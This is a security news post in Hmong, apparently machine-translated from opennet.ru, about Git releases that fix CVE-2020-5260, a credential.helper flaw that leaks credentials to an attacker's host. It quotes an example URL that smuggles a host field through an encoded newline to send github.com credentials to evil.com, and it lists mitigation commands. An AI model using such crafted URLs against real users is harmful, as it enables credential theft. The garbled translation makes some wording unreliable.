ProHoster > Π‘Π»ΠΎΠ³ > xov xwm hauv internet > Git credential leakage vulnerability

Git credential leakage vulnerability

Tshaj tawm Kev kho qhov tso tawm ntawm kev faib tawm tswj qhov system Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 thiab 2.17.4, hauv uas tshem tawm yooj yim (CVE-2020-5260) nyob rau hauv lub handler "credential.helper", uas ua rau cov ntawv pov thawj raug xa mus rau tus tswv tsev tsis raug thaum tus neeg siv khoom git nkag mus rau qhov chaw khaws cia siv qhov tshwj xeeb formatted URL uas muaj cov cim tshiab. Qhov tsis zoo tuaj yeem siv los npaj cov ntawv pov thawj los ntawm lwm tus tswv tsev kom xa mus rau lub server tswj los ntawm tus neeg tawm tsam.

Thaum qhia txog qhov URL zoo li "https://evil.com?%0ahost=github.com/", tus neeg tuav ntaub ntawv pov thawj thaum txuas rau tus tswv tsev phem.com yuav dhau qhov kev lees paub tsis raug teev tseg rau github.com. Qhov teeb meem tshwm sim thaum ua haujlwm xws li "git clone", suav nrog kev ua URLs rau submodules (piv txwv li, "git submodule hloov tshiab" yuav cia li ua cov URLs teev nyob rau hauv .gitmodules cov ntaub ntawv los ntawm qhov chaw cia). Qhov tsis zoo yog qhov txaus ntshai tshaj plaws hauv cov xwm txheej uas tus tsim tawm clones lub chaw cia khoom tsis pom qhov URL, piv txwv li, thaum ua haujlwm nrog submodules, lossis hauv cov tshuab ua haujlwm tsis siv neeg, piv txwv li, hauv pob tsim cov ntawv.

Txhawm rau thaiv qhov tsis zoo hauv cov ntawv tshiab txwv tsis pub hla tus cim kab tshiab hauv txhua qhov txiaj ntsig tau kis los ntawm kev sib pauv ntaub ntawv pov thawj. Rau kev faib tawm, koj tuaj yeem taug qab qhov kev tso tawm pob tshiab ntawm nplooj ntawv Debian, Ubuntu, RHEL, SUSE/openSUSE, Fedora, Koov, FreeBSD.

Raws li kev daws teeb meem los thaiv qhov teeb meem pom zoo Tsis txhob siv credential.helper thaum nkag mus rau pej xeem repositories thiab tsis txhob siv "git clone" nyob rau hauv "--recurse-submodules" hom nrog unchecked repositories. Yuav kom lov tes taw kiag li credential.helper handler, uas ua kev khaws cia thiab khaws cov passwords los ntawm cache, tiv thaiv chaw khaws cia lossis cov ntaub ntawv nrog tus password, koj tuaj yeem siv cov lus txib:

git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper

Tau qhov twg los: opennet.ru

Ntxiv ib saib